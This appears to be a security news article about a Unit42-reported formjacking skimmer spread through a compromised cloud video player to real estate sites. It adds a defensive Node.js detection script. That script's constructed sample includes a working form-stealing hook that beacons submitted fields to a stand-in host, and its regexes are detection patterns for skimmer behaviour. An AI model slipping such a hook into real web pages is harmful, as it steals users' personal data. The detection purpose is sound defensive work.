Supply chain attacks can devastate an organization's critical infrastructure, because a single weak link can let threat actors compromise the entire network. Recently, security researchers from Unit42 found a supply chain attack that used a cloud video platform to spread a formjacking skimmer. The researchers report that they have detected over 100 real estate sites compromised by the same skimmer.
In formjacking attacks, attackers inject malicious JavaScript into the victim's website to capture the sensitive information that users enter into its forms. The injected code alters the behavior of the targeted website without the user's knowledge.
The researchers stated that the skimmer harvested victims' sensitive information, such as names, emails and phone numbers, and sent it to a collection server at https://cdn-imgcloud[.]com/img, a domain that is itself malicious.
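The following is an added example, not code from the Unit42 report or from the affected platform: a small Node.js triage script that scores a JavaScript file for the two behaviours a formjacking skimmer has to combine, reading form fields and sending data to a host the site does not normally talk to. The regex heuristics, the allowlist, the host names and both sample scripts are constructed for this illustration; a real campaign's collection domain would simply be one more host missing from the allowlist.

```javascript
'use strict';

// Added example, not from the Unit42 report. Static triage of a JavaScript file
// for the formjacking pattern: form-field harvesting combined with an outbound
// send to a host the site does not expect. All patterns and samples are constructed.

// Markers of reading user input from forms.
const FORM_READ = [
  /\b(querySelectorAll|querySelector|getElementsByTagName)\(\s*['"`](input|form|select|textarea)/,
  /\bnew\s+FormData\s*\(/,
  /addEventListener\(\s*['"`]submit['"`]/,
];
// Markers of sending data off the page (image beacons included).
const SEND = [/\bfetch\s*\(/, /\bXMLHttpRequest\b/, /\bsendBeacon\s*\(/, /\.src\s*=/];
// Markers commonly seen in obfuscated payloads; they raise the score but never decide alone.
const OBFUSCATION = [/\beval\s*\(/, /\batob\s*\(/, /String\.fromCharCode/, /\\x[0-9a-fA-F]{2}/];

// Collects the lower-cased hostname of every http(s) URL literal in the source.
function extractHosts(source) {
  const hosts = new Set();
  const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = urlRe.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Scores one script against an allowlist of hosts the page legitimately talks to.
function auditScript(source, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const hosts = extractHosts(source);
  const unexpectedHosts = hosts.filter((h) => !allowed.has(h));
  const readsForms = FORM_READ.some((re) => re.test(source));
  const sendsData = SEND.some((re) => re.test(source));
  const obfuscated = OBFUSCATION.some((re) => re.test(source));
  // Reading forms plus sending to an unexpected host is the skimmer signature;
  // the unexpected host weighs most because it is the hardest part to explain away.
  const score =
    (readsForms ? 1 : 0) + (sendsData ? 1 : 0) + (unexpectedHosts.length ? 2 : 0) + (obfuscated ? 1 : 0);
  const verdict = score >= 4 ? 'skimmer-like' : score >= 2 ? 'review' : 'clean';
  return { readsForms, sendsData, obfuscated, hosts, unexpectedHosts, score, verdict };
}

// Constructed sample 1: a legitimate player customisation that reports playback
// events to the site's own metrics host.
const BENIGN_PLAYER_SCRIPT = `
  var player = document.querySelector('#video-player');
  player.addEventListener('play', function () {
    navigator.sendBeacon('https://metrics.example/play', player.id);
  });
`;

// Constructed sample 2: the same file with a form-submission hook attached that
// beacons the submitted fields to an unrelated host.
const SKIMMER_LIKE_SCRIPT = BENIGN_PLAYER_SCRIPT + `
  document.addEventListener('submit', function (e) {
    var fields = {};
    new FormData(e.target).forEach(function (v, k) { fields[k] = v; });
    new Image().src = 'https://collector.invalid/img?d=' + btoa(JSON.stringify(fields));
  });
`;

// Hosts this (constructed) site is expected to contact from its scripts.
const SITE_ALLOWLIST = ['metrics.example'];

for (const [name, src] of [['benign', BENIGN_PLAYER_SCRIPT], ['tampered', SKIMMER_LIKE_SCRIPT]]) {
  const r = auditScript(src, SITE_ALLOWLIST);
  console.log(`${name}: ${r.verdict} (score ${r.score}, unexpected hosts: ${r.unexpectedHosts.join(', ') || 'none'})`);
}
```

Run it over every script the site serves, including the ones pulled in from third-party platforms, and treat any file that moves from "clean" to "review" or "skimmer-like" between two scans as a change that needs a human look: the allowlist is what turns a noisy string scan into a useful signal, so keep it tight and per site.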
“The skimmer itself is highly polymorphic, elusive, and continuously evolving. When combined with cloud distribution platforms, the impact of a skimmer of this type could be very large. For these reasons, attacks like this raise the stakes for security researchers to untangle their sophisticated strategies and trace them to the root cause. We have to invent more sophisticated strategies to detect skimmer campaigns of this type since merely blocking domain names or URLs used by skimmers is ineffective,” the researchers said.
Hackers Deploy Malicious Code in Video
Unit42 researchers stated that the attackers injected the skimmer code into the cloud video platform's player, so it is downloaded automatically whenever a site imports a video that uses the compromised player. Explaining how the skimmer got into the player, the researchers added, “When the cloud platform user creates a player, the user is allowed to add their own JavaScript customizations by uploading a JavaScript file to be included in their player. In this specific instance, the user uploaded a script that could be modified upstream to include malicious content. We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.”